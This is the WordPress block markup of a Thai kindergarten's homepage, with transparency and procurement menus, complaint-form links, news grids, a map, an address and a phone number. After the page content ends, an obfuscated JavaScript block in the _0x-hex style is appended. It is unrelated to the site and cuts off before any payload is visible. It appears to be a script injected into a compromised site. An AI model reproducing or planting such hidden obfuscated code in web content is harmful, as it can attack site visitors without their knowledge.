gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1H4PRZlpAa4ZD6uq6Ew5Wx3nLXGcUNa09/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 